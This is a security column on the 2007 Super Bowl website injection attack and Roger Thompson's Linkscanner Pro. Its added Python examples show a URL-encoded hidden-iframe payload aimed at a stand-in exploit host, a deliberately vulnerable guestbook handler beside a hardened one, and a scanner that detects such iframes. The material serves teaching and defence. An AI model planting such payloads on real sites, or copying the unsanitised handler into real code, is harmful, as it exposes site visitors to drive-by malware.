Not too long ago, security researcher Roger Thompson had an epiphany. He already had a well-established, globally distributed network of honeypots and had caught more than a few outbreaks with it. But the days of new threats such as Sasser and Netsky, both of which lit up his switchboard instantly, were over. Now an attack lights up one honeypot in one part of the world, then one in another part, then another. The new attacks, he realized, were increasingly targeted and were being carefully meted out so as not to trip honeypot networks like his. Today's attacks were being discovered only by reading the honeypot logs well after the fact. Thompson concluded that the model was backward: rather than sitting back and waiting for attacks to come to him, he needed to go out and find the attacks as they happen. It was a timely shift. Shortly before the 2007 Super Bowl, thousands of visitors to a Super Bowl Web site discovered how a perfectly legitimate site can also be the source of a rather nasty Trojan horse.
Super Bowl exploits
Injecting malicious code onto legitimate Web sites is deceptively simple to do, assuming the Web site is vulnerable, that is.
A criminal hacker needs little more than a Web browser to accomplish the task. The attackers who hit the Super Bowl site apparently browsed to it, appended a script tag and a few lines of code pointing at their exploit server to the existing URL, and then revisited the site. The Web server accepted the injected script from that request without sanitizing it and wrote a malicious iFrame into the legitimate Super Bowl page, where it persisted. The browser of every subsequent visitor then loaded that iFrame, which silently pulled content from the exploit server. The underlying weakness is the same one behind any injection flaw: the server took untrusted input from a URL and folded it into the page it served to everyone else.
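The injection pattern described above, as an added example that is not the column's code and not the code of the actual Super Bowl site (the guestbook handler, the `msg` parameter, and the hostnames are assumptions made for illustration): a handler that stores whatever arrives in a query parameter and concatenates it into the page, beside the same handler with output encoding applied. Replaying a constructed request log through each shows why the attacker only needed a browser and why every later visitor received the iFrame.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker request (hostnames are assumptions for this example): the payload
# is an ordinary URL with a zero-size iframe, URL-encoded, in the 'msg' query parameter.
ATTACK_URL = ("http://www.example-stadium.test/guestbook?msg="
              "%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example%2Fx.html%22"
              "%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E")

# Constructed traffic: a normal visitor, the attacker's crafted request, then a later visitor
# who sends no parameter at all and still gets whatever was stored before.
REQUEST_LOG = [
    "http://www.example-stadium.test/guestbook?msg=Go+team",
    ATTACK_URL,
    "http://www.example-stadium.test/guestbook",
]


def extract_messages(url):
    """Return the 'msg' query parameters of a request URL, decoded exactly as submitted."""
    return parse_qs(urlsplit(url).query).get("msg", [])


def render_vulnerable(stored):
    """Vulnerable handler: stored strings are concatenated straight into the HTML."""
    return "<html><body><h1>Guestbook</h1>\n" + "\n".join(stored) + "\n</body></html>"


def render_hardened(stored):
    """Same handler with output encoding: <, >, & and quotes become entities, so a stored
    <iframe ...> is displayed as text instead of being parsed as markup."""
    return ("<html><body><h1>Guestbook</h1>\n"
            + "\n".join(html.escape(m, quote=True) for m in stored)
            + "\n</body></html>")


def serve(url_log, render):
    """Replay a log of request URLs through a handler; return the page the last visitor sees.
    Storage is persistent across requests, which is what turns one crafted URL into an
    infection of every later page view."""
    stored = []
    for url in url_log:
        stored.extend(extract_messages(url))
    return render(stored)


if __name__ == "__main__":
    print("--- vulnerable handler, as seen by the third visitor ---")
    print(serve(REQUEST_LOG, render_vulnerable))
    print("--- hardened handler, same traffic ---")
    print(serve(REQUEST_LOG, render_hardened))
```

Output encoding at render time is the fix for this class of bug; rejecting the string `<script` or `<iframe` on input is not, since an attacker has many encodings and tag variants to choose from, and the stored content may later be rendered in a context the input filter never anticipated.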
Not a phishing site
There are tools available that check and rate the relative security of Web sites. One, McAfee SiteAdvisor, ranks the relative safety of thousands of Web sites. But the defaced Super Bowl site was not a phishing site, so SiteAdvisor gave it its healthy seal of approval: a safety rating assigned to a domain ahead of time says nothing about what that domain is serving right now, and a trusted site that has just been injected keeps its good rating. Thompson's own tool, Linkscanner Pro, instead inspects the HTML as it is returned from the Web server to your browser; it identified the exploit code in the Super Bowl page and blocked it, while still allowing users to view the site.
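What an inline scanner of the kind described above has to do, as an added example that is not Linkscanner's code (the column does not describe its detection logic; the rule used here, the hostnames and the sample pages are assumptions): parse the HTML as it comes back from the server, before the browser acts on it, and flag iframes, scripts and plugin objects that load from a host other than the page's own, treating hidden or zero-size ones as a block.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample responses (hostnames are assumptions for this example).
PAGE_URL = "http://www.example-stadium.test/"

INFECTED_PAGE = """<html><body>
<h1>Super Bowl Week</h1>
<script src="/js/site.js"></script>
<iframe src="http://exploit.example/x.html" width="0" height="0" frameborder="0"></iframe>
</body></html>"""

PARTNER_PAGE = """<html><body>
<h1>Super Bowl Week</h1>
<iframe src="http://ads.partner.test/banner" width="468" height="60"></iframe>
</body></html>"""

CLEAN_PAGE = """<html><body><h1>Super Bowl Week</h1>
<script src="/js/site.js"></script>
<img src="http://cdn.example-stadium.test/logo.png">
</body></html>"""


def _looks_hidden(attrs):
    """Heuristic: a frame/script is 'hidden' if it is at most 1px in either dimension
    or its inline style hides it. Real drive-by iframes are usually sized 0x0."""
    for dim in ("width", "height"):
        v = (attrs.get(dim) or "").strip().rstrip("px")
        if v.isdigit() and int(v) <= 1:
            return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class _RemoteLoadFinder(HTMLParser):
    """Collects elements that pull executable or framed content from another host."""

    WATCHED = ("iframe", "script", "object", "embed")

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.WATCHED:
            return
        a = dict(attrs)                      # attribute values may be None
        src = a.get("src") or a.get("data")  # <object data=...> uses 'data'
        if not src:
            return
        host = urlsplit(src).hostname
        if host is None or host == self.page_host:
            return                           # relative or same-host load: not a third-party pull
        self.findings.append({"tag": tag, "src": src, "host": host,
                              "hidden": _looks_hidden(a)})


def scan_response(page_url, body):
    """Inspect an HTML response on its way to the browser.

    Returns (verdict, findings): 'block' if any third-party frame/script is hidden,
    'warn' if third-party loads exist but are visible, 'allow' otherwise."""
    finder = _RemoteLoadFinder(urlsplit(page_url).hostname)
    finder.feed(body)
    finder.close()
    if any(f["hidden"] for f in finder.findings):
        return "block", finder.findings
    if finder.findings:
        return "warn", finder.findings
    return "allow", finder.findings


if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("partner", PARTNER_PAGE), ("clean", CLEAN_PAGE)):
        verdict, findings = scan_response(PAGE_URL, page)
        print(name, verdict, [(f["tag"], f["host"]) for f in findings])
```

The rule is deliberately a heuristic: legitimate ad networks and analytics also load third-party scripts, which is why visible cross-host loads only warn, and the attacker can shrink a frame with CSS, nest it in a script-generated element, or point it at a freshly registered host that no blocklist knows yet. Note also that this kind of content inspection says nothing about whether the page itself is a phishing page, which is the gap the column notes later.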
Whack-a-mole
Thompson, and others I spoke with at RSA, believe there are perhaps a handful of true malicious-code geniuses working in the world today. You'll probably never know their names, but you might run across their handiwork from time to time on the Internet. Shielding them are Internet gangs that buy the malicious code and then distribute it by defacing Web sites such as the Super Bowl's or the CDC's to lure unsuspecting people into compromising their machines. Once compromised, a desktop PC can become part of a botnet, a spam relay, or a target of identity theft.
Thompson has found that, at any given time, there are maybe a few dozen malware writers operating in the world; indeed, the infected pages identified by Thompson's Linkscanner Pro often point back to just a few dozen Web servers. When Thompson and others do get one exploit server shut down, the gangs simply move to a different URL. Often the exploit servers are hosted in parts of the world where laws, language, or even a basic understanding of the problem make it hard to get the malicious content removed from the Internet.
Prevention
After using it for more than a week, I found Thompson's Linkscanner Pro is great at stopping the malicious code, but I also found it missed several reported phishing sites; it wasn't really designed for that. To identify and block phishing sites, use the free Netcraft toolbar alongside Thompson's tool. I find that Netcraft consistently blocks suspected phishing sites better than some of the paid antiphishing protection.